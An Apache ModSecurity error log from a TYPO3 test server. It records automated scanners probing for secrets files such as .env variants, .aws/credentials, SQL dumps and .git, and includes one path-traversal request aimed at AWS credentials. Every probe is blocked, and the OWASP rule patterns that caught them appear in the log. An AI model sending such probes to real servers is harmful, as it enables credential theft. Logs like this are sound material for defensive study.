[Tue Nov 11 19:36:01.806848 2025] [:error] [pid 4188368] [client 62.60.131.162:54201] [client 62.60.131.162] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aROCEUYXkTqgv48mPPt-CwAAAAY"]
[Tue Nov 11 19:36:01.807172 2025] [:error] [pid 4188368] [client 62.60.131.162:54201] [client 62.60.131.162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aROCEUYXkTqgv48mPPt-CwAAAAY"]
[Tue Nov 11 19:36:01.807411 2025] [:error] [pid 4188368] [client 62.60.131.162:54201] [client 62.60.131.162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aROCEUYXkTqgv48mPPt-CwAAAAY"]
[Tue Nov 11 19:36:01.862405 2025] [authz_core:error] [pid 4186579] [client 62.60.131.162:54203] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/dump.sql
[Tue Nov 11 19:36:01.863045 2025] [authz_core:error] [pid 4188368] [client 62.60.131.162:54209] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backup.sql
[Tue Nov 11 19:36:01.870738 2025] [:error] [pid 4185599] [client 62.60.131.162:65422] [client 62.60.131.162] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aROCEZ_5RQOOx5bVwaq58gAAAAA"]
[Tue Nov 11 19:36:01.871010 2025] [:error] [pid 4185599] [client 62.60.131.162:65422] [client 62.60.131.162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aROCEZ_5RQOOx5bVwaq58gAAAAA"]
[Tue Nov 11 19:36:01.871186 2025] [:error] [pid 4185599] [client 62.60.131.162:65422] [client 62.60.131.162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aROCEZ_5RQOOx5bVwaq58gAAAAA"]
[Tue Nov 11 19:36:01.931967 2025] [:error] [pid 4182322] [client 62.60.131.162:54433] [client 62.60.131.162] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "46"] [id "930100"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "surf.test.indacotrentino.com"] [uri "/pms"] [unique_id "aROCEcigdidSJZS2nZXttgAAAGU"]
[Tue Nov 11 19:36:01.932031 2025] [:error] [pid 4182322] [client 62.60.131.162:54433] [client 62.60.131.162] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "surf.test.indacotrentino.com"] [uri "/pms"] [unique_id "aROCEcigdidSJZS2nZXttgAAAGU"]
[Tue Nov 11 19:36:01.932071 2025] [:error] [pid 4182322] [client 62.60.131.162:54433] [client 62.60.131.162] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "surf.test.indacotrentino.com"] [uri "/pms"] [unique_id "aROCEcigdidSJZS2nZXttgAAAGU"]
[Tue Nov 11 19:36:01.932780 2025] [:error] [pid 4182322] [client 62.60.131.162:54433] [client 62.60.131.162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/pms"] [unique_id "aROCEcigdidSJZS2nZXttgAAAGU"]
[Tue Nov 11 19:36:01.932947 2025] [:error] [pid 4182322] [client 62.60.131.162:54433] [client 62.60.131.162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/pms"] [unique_id "aROCEcigdidSJZS2nZXttgAAAGU"]
[Wed Nov 12 05:02:37.762404 2025] [authz_core:error] [pid 1691] [client 161.35.76.199:42330] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Nov 12 16:21:10.205636 2025] [authz_core:error] [pid 11036] [client 93.123.109.7:44916] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Nov 16 01:10:22.998521 2025] [:error] [pid 99126] [client 34.61.77.225:33700] [client 34.61.77.225] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRkWbhTiMv9hdOBEy6WZfgAAAAQ"]
[Sun Nov 16 01:10:22.998774 2025] [:error] [pid 99126] [client 34.61.77.225:33700] [client 34.61.77.225] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRkWbhTiMv9hdOBEy6WZfgAAAAQ"]
[Sun Nov 16 01:10:22.998951 2025] [:error] [pid 99126] [client 34.61.77.225:33700] [client 34.61.77.225] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRkWbhTiMv9hdOBEy6WZfgAAAAQ"]
[Sun Nov 16 12:38:49.545628 2025] [:error] [pid 113290] [client 3.8.102.89:51544] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aRm3yX9I9DIP5OQurvpqjwAAAAQ"]
[Sun Nov 16 12:38:49.545881 2025] [:error] [pid 113290] [client 3.8.102.89:51544] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aRm3yX9I9DIP5OQurvpqjwAAAAQ"]
[Sun Nov 16 12:38:49.546048 2025] [:error] [pid 113290] [client 3.8.102.89:51544] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aRm3yX9I9DIP5OQurvpqjwAAAAQ"]
[Sun Nov 16 12:38:49.553222 2025] [:error] [pid 113296] [client 3.8.102.89:51538] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aRm3yf7nuvXY8JVEGWXCfgAAAA8"]
[Sun Nov 16 12:38:49.553399 2025] [:error] [pid 113296] [client 3.8.102.89:51538] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aRm3yf7nuvXY8JVEGWXCfgAAAA8"]
[Sun Nov 16 12:38:49.553416 2025] [:error] [pid 107823] [client 3.8.102.89:51560] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aRm3yWZlvYqdbt58w-ZoQQAAABA"]
[Sun Nov 16 12:38:49.553546 2025] [:error] [pid 113296] [client 3.8.102.89:51538] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aRm3yf7nuvXY8JVEGWXCfgAAAA8"]
[Sun Nov 16 12:38:49.553585 2025] [:error] [pid 107823] [client 3.8.102.89:51560] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aRm3yWZlvYqdbt58w-ZoQQAAABA"]
[Sun Nov 16 12:38:49.553778 2025] [:error] [pid 107823] [client 3.8.102.89:51560] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aRm3yWZlvYqdbt58w-ZoQQAAABA"]
[Sun Nov 16 12:38:49.601167 2025] [:error] [pid 113276] [client 3.8.102.89:51548] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aRm3ybXvaf1IcB4yJOvE-gAAAAU"]
[Sun Nov 16 12:38:49.601351 2025] [:error] [pid 113276] [client 3.8.102.89:51548] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aRm3ybXvaf1IcB4yJOvE-gAAAAU"]
[Sun Nov 16 12:38:49.601506 2025] [:error] [pid 113276] [client 3.8.102.89:51548] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aRm3ybXvaf1IcB4yJOvE-gAAAAU"]
[Sun Nov 16 12:38:49.641035 2025] [:error] [pid 113274] [client 3.8.102.89:51568] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aRm3yY4DuVT7Zp3PDSdxIgAAAAE"]
[Sun Nov 16 12:38:49.641233 2025] [:error] [pid 113274] [client 3.8.102.89:51568] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aRm3yY4DuVT7Zp3PDSdxIgAAAAE"]
[Sun Nov 16 12:38:49.641400 2025] [:error] [pid 113274] [client 3.8.102.89:51568] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aRm3yY4DuVT7Zp3PDSdxIgAAAAE"]
[Sun Nov 16 12:38:49.657953 2025] [:error] [pid 107814] [client 3.8.102.89:51582] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRm3yYYUzNZoYnjqey4-9QAAAAc"]
[Sun Nov 16 12:38:49.658135 2025] [:error] [pid 107814] [client 3.8.102.89:51582] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRm3yYYUzNZoYnjqey4-9QAAAAc"]
[Sun Nov 16 12:38:49.658287 2025] [:error] [pid 107814] [client 3.8.102.89:51582] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRm3yYYUzNZoYnjqey4-9QAAAAc"]
[Sun Nov 16 12:38:50.850076 2025] [authz_core:error] [pid 106377] [client 3.8.102.89:51624] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.swp
[Sun Nov 16 12:38:50.863820 2025] [:error] [pid 113283] [client 3.8.102.89:51608] [client 3.8.102.89] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env.old"] [unique_id "aRm3yg0D7yRPJp9gclT4hQAAAAM"]
[Sun Nov 16 12:38:50.863977 2025] [:error] [pid 113283] [client 3.8.102.89:51608] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env.old"] [unique_id "aRm3yg0D7yRPJp9gclT4hQAAAAM"]
[Sun Nov 16 12:38:50.864193 2025] [:error] [pid 113283] [client 3.8.102.89:51608] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env.old"] [unique_id "aRm3yg0D7yRPJp9gclT4hQAAAAM"]
[Sun Nov 16 12:38:50.864357 2025] [:error] [pid 113283] [client 3.8.102.89:51608] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env.old"] [unique_id "aRm3yg0D7yRPJp9gclT4hQAAAAM"]
[Sun Nov 16 12:38:50.887555 2025] [:error] [pid 111778] [client 3.8.102.89:51670] [client 3.8.102.89] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aRm3yh7OFadbAiGPfqkqygAAAAI"]
